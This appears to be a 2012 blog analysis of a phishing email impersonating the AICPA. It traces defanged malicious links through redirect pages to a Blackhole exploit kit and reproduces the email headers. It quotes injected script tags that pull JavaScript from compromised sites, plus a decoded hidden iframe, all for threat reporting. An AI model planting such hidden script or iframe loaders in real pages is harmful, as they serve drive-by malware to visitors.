I received an email reportedly from support@aicpa.org this morning. The email was clearly a phishing email as I’m not a CPA and it was addressed to “Dear accounting officer”. A picture of the email is included below:
In order to avoid muddying up the post, the email header is included at the bottom of the page. Within the email, there are three links, which are included below and are considered MALICIOUS.
hxxp://omerteke.com/KM8PHYEu/index.html
hxxp://harboritalia.it/DxbQU2vE/index.html
hxxp://martvarauto.ee/sN6saxG7/index.html
Each of these sites then performs a number of redirects (All identical):
WAIT PLEASE
Loading…
script type=”text/javascript” src=”hxxp://46.20.6.63/0v5qYtwZ/js.js”>
script type="text/javascript" src="hxxp://amarchand.awardspace.info/1gUNQseT/js.js">
script type="text/javascript" src="hxxp://rosecon.com.br/V71toiu2/js.js">
script type=”text/javascript” src=”hxxp://seniordatinggroup.com.au/7b1kameF/js.js”>
script type="text/javascript" src="hxxp://vnnetsoft.vn/M3ags716/js.js">
script type="text/javascript" src="hxxp://www.limpfast.com.br/hZfvvbmd/js.js">
Each of the links above redirect back to the link below:
hxxp://biggestsetter.com/search.php?page=73a07bcb51f4be71
This site hosts a live blackhole exploit kit (Full Report). Additionally, it performs another redirection to hxxp:\\billydimple.com/search.php?page=73a07bcb51f4be71. Although that specific link is inactive at the moment (Full Report), other known malicious links at hxxp:\\billydimple.com have been analyzed, which host blackhole, and mimic the bing search engine.
Additionally, the hxxp://omerteke.com source includes obfuscated javascript that decodes to the following URL:
iframe src=’hxxp://datastatcount.com/1/stat.php’ width=’10′ height=’10′ style=’visibility:hidden;position:absolute;left:0;top:0;’
This URL then includes an additional obfuscated script, with additional redirects (full report):
hxxp://bs.yandex.ru/resource/watch.js
hxxp://alantur.in/templates/artgen/js/jquery.js
hxxp://alantur.in/engine/ajax/ajax.js
hxxp://informer.gismeteo.Ru/flash/fcode.js
hxxp://i1.i.ua/finance/cur.swf?langID=0
hxxp://alantur.in/in.cgi?12
hxxp://alantur.in/engine/ajax/edit.js
hxxp://module.ittour.com.ua/search.jsx?id=D45221G3192126M299676&ver=1&type=2970
That’s about all the analysis I have time for right now, but I’d be interested to see if anyone else comes across the phishing email or does any analysis on the eventual payload!
Received: from SN2PRD0702HT001.namprd07.prod.outlook.com (10.27.84.111) by
BY2PRD0710HT002.namprd07.prod.outlook.com (10.255.86.37) with Microsoft SMTP
Server (TLS) id 14.16.117.1; Fri, 17 Feb 2012 15:38:05 +0000
Received: from SN2PRD0702HT006.namprd07.prod.outlook.com (10.27.84.28) by
SN2PRD0702HT001.namprd07.prod.outlook.com (10.27.84.111) with Microsoft SMTP
Server (TLS) id 14.15.39.1; Fri, 17 Feb 2012 15:38:04 +0000
Received: from mail9-tx2-R.bigfish.com (65.55.88.116) by
SN2PRD0702HT006.namprd07.prod.outlook.com (10.27.84.28) with Microsoft SMTP
Server (TLS) id 14.15.39.1; Fri, 17 Feb 2012 15:38:04 +0000
Received: from mail9-tx2 (localhost [127.0.0.1]) by mail9-tx2-R.bigfish.com
(Postfix) with ESMTP id D3845180247 for
17 Feb 2012 15:38:04 +0000 (UTC)
X-Safelisted-IP: 192.149.109.20
X-Forefront-Antispam-Report: CIP:192.149.109.20;KIP:192.149.109.20;UIP:(null);(null);H:mail.norwich.edu;R:internal;EFV:INT
X-FOPE-CONNECTOR: SANITIZED
Received: from mail9-tx2 (localhost.localdomain [127.0.0.1]) by mail9-tx2
(MessageSwitch) id 1329493081419435_6792; Fri, 17 Feb 2012 15:38:01 +0000
(UTC)
Received: from TX2EHSMHS025.bigfish.com (unknown [10.9.14.253]) by
mail9-tx2.bigfish.com (Postfix) with ESMTP id 5567B1C0046 for
Received: from mail.norwich.edu (192.149.109.20) by TX2EHSMHS025.bigfish.com
(10.9.99.125) with Microsoft SMTP Server id 14.1.225.23; Fri, 17 Feb 2012
15:37:58 +0000
X-IronPort-AV: E=Sophos;i=”4.73,438,1325480400″;
d=”scan’208,217″;a=”31216418″
Received: from 187-62-239-56-pppoe-12089.brasweb.com.br ([187.62.239.56]) by
mail.norwich.edu with ESMTP; 17 Feb 2012 10:37:56 -0500
Received: from apache by aicpa.org with local (Exim 4.67) (envelope-from
2012 12:37:56 -0300
To:
Subject: Termination of your accountant license.
X-PHP-Script: aicpa.org/sendmail.php for 187.62.239.56
From: Eloy Howell
X-Sender: “Eloy Howell”
X-Mailer: PHP
X-Priority: 1
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=”————05020200503020303060601″
Message-ID:
Date: Thu, 16 Feb 2012 12:37:56 -0300
Return-Path: support@aicpa.org
X-MS-Exchange-Organization-SCL: 0
X-MS-Exchange-Organization-AVStamp-Mailbox: MSFTFF;1;0;0 0 0
X-MS-Exchange-Organization-AuthSource:
SN2PRD0702HT006.namprd07.prod.outlook.com
X-MS-Exchange-Organization-AuthAs: Anonymous